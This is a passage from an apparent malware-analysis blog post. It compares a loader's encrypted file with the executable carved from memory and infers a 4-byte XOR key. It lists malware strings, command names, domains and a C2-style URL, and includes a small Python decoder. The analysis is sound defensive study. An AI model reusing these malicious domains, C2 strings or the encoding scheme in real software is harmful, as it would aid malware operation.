User-Agent: Opera/10.60 Presto/2.2.30
mmc
.txt
.exe
open
delshed
exec:thr1
htt
t\*.*
.chm
mmc_install
runas
.dll
delshedexec
shedexec
downadminexec
xec2
User-Agent: Opera/10.60 Presto/2.2.30
ABCDEFG
local
explorer.exe
accuratefiles.com
elsoplongt.com
et-treska.com
lulango.com
shedscr:3:120 http://presentpie.vv.cc/showthread.php?t=332864

Much better! 

Based on this level of analysis, we now know a lot more about the malware. We have a very good notion that the initial malware.exe was a loader that decrypted an internal executable and injected it into memory. We also know that the injected executable is responsible for network connections.

However, what happened to the original strings we pulled out? They're not in the new display! And can we figure anything else out about the encryption? We're going to need to up our game a bit to see what's going on.

Level 4 (Visual Analysis)


The original executable was 48640 bytes. What we pulled from memory was 34304 bytes. There are 14336 (0x3800) bytes unaccounted for. The process we pulled out of memory could be a second executable injected by the malware, in which case the original strings from the loader were cast off in memory like a snake shedding its skin.
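The size arithmetic is simple enough to check in a Python prompt. The variable names below are mine; the two sizes are the ones quoted above.

```python
original_size = 48640   # malware.exe on disk
dumped_size = 34304     # executable.1548.exe carved by procexedump

missing = original_size - dumped_size
print(missing, hex(missing))
```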

Scratching my head a bit, I take the original malware executable and just page through it with a hex editor, comparing sections side-by-side with the extracted executable. If you've ever taken any of my malware analysis training, I emphasize the power of the human eye to detect patterns better than any software. This proves to be the case here.



Notice the similarities? The extracted file from Volatility is a series of PADDINGXX, which is STANDARD and BENIGN for executables with resources. (I've read way too many analysis reports that called this out as an indicator). Look at the encrypted file and you'll see a series of ..DD...X repeating in a pattern. Comparing bytes above and below also show series of two-byte segments that are the same. Interesting. Could be an encoding routine that skips certain bytes, or a multi-byte XOR with null characters in the key. Wherever there's a null byte in an XOR key, the original data will remain, so this could be the case.

This overlap was, roughly, at the 95% mark of the decrypted file and the 80% mark of the encrypted file, which further suggests that the remaining data in the original file was a shell used to inject an executable. Once launched, and extracted by Volatility, all we recovered was the injected portion.

Scrolling up through the decrypted file, I see a block of configuration data jump out at me. Scrolling up to roughly the same point in the original file, I see what could be its encrypted values:


There may be a few bytes off between the samples, as is the case here (such as the row of 0x01's in the encrypted version), but your eye should adjust for these and see the data around it.

Of note is the large block of null data below the value on the decrypted side. If there's an encryption key through an XOR operation, you'll typically see it on the encrypted side wherever there's a null block on the decrypted. And here, we see a pattern of 0x0000BC85 over and over, which could be a 4-byte XOR key.

Based on this, we have a fair idea that the malware contains an encrypted executable, which is injected on runtime. This injection contains a configuration block containing multiple domain names, some not seen during runtime. We also have good evidence that the encoding was done via a 4-byte XOR key of 0x0000BC85 (or 0xBC850000, or 0x850000BC, or 0x00BC8500). 
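The four candidate byte orders are just rotations of the same four bytes, so they can be tried mechanically. The sketch below is a rough illustration, not the malware's actual routine: the helper names are mine, the printable-ratio score only makes sense on a region expected to decode to text (for a whole executable you would check for an MZ header instead), and the demo encrypts a known string with one rotation so the output can be checked.

```python
from itertools import cycle


def xor_with_key(data, key):
    """Apply a repeating XOR key to data."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def key_rotations(key):
    """Return every byte rotation of the key, starting with the key itself."""
    return [key[i:] + key[:i] for i in range(len(key))]


def printable_ratio(data):
    """Fraction of bytes that fall in the printable ASCII range."""
    if not data:
        return 0.0
    return sum(0x20 <= b <= 0x7E for b in data) / len(data)


def best_rotation(encrypted, key):
    """Pick the rotation whose output looks most like text."""
    return max(key_rotations(key),
               key=lambda k: printable_ratio(xor_with_key(encrypted, k)))


if __name__ == "__main__":
    # Demo data only: a string seen in the memory dump, encrypted here with
    # one of the candidate byte orders so that the search has an answer.
    secret = b"shedscr:3:120 http://presentpie.vv.cc/showthread.php?t=332864"
    encrypted = xor_with_key(secret, bytes.fromhex("bc850000"))

    guess = best_rotation(encrypted, bytes.fromhex("0000bc85"))
    print(guess.hex(), xor_with_key(encrypted, guess))
```

Against the real sample, the starting offset of the encrypted region decides which rotation lines up, which is one more reason the byte order can't be settled from the hex view alone.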

Conclusion

Dynamically analyzing malware is a varied art and science. Most of the industry is worried about the high level indicators, shown in the first portion of this analysis. However, this often leaves behind more questions than it answers. There are a lot of very important items that we would have completely missed had we not dug deeper. 

The art of analysis is not just from being able to look at activity and understanding it. It comes from being able to see a logical problem in front of you and understanding how to overcome the challenge. Each sample is different, each challenge is unique, and techniques that work for this malware will be useless on the next. 

That's the joy of malware analysis.


Stay tuned for Part 2: Static Analysis (a.k.a. Brian procrastinating his book writing). There, we'll use IDA Pro (or Hopper) to find encrypted strings, work out the loader logic, figure out why and how it's dropping files, and see what other fun things the malware does.



Updates:
11 Feb 14 - Fixed one hash, reworded encoding segments, thanks to feedback from Mark Heidrick 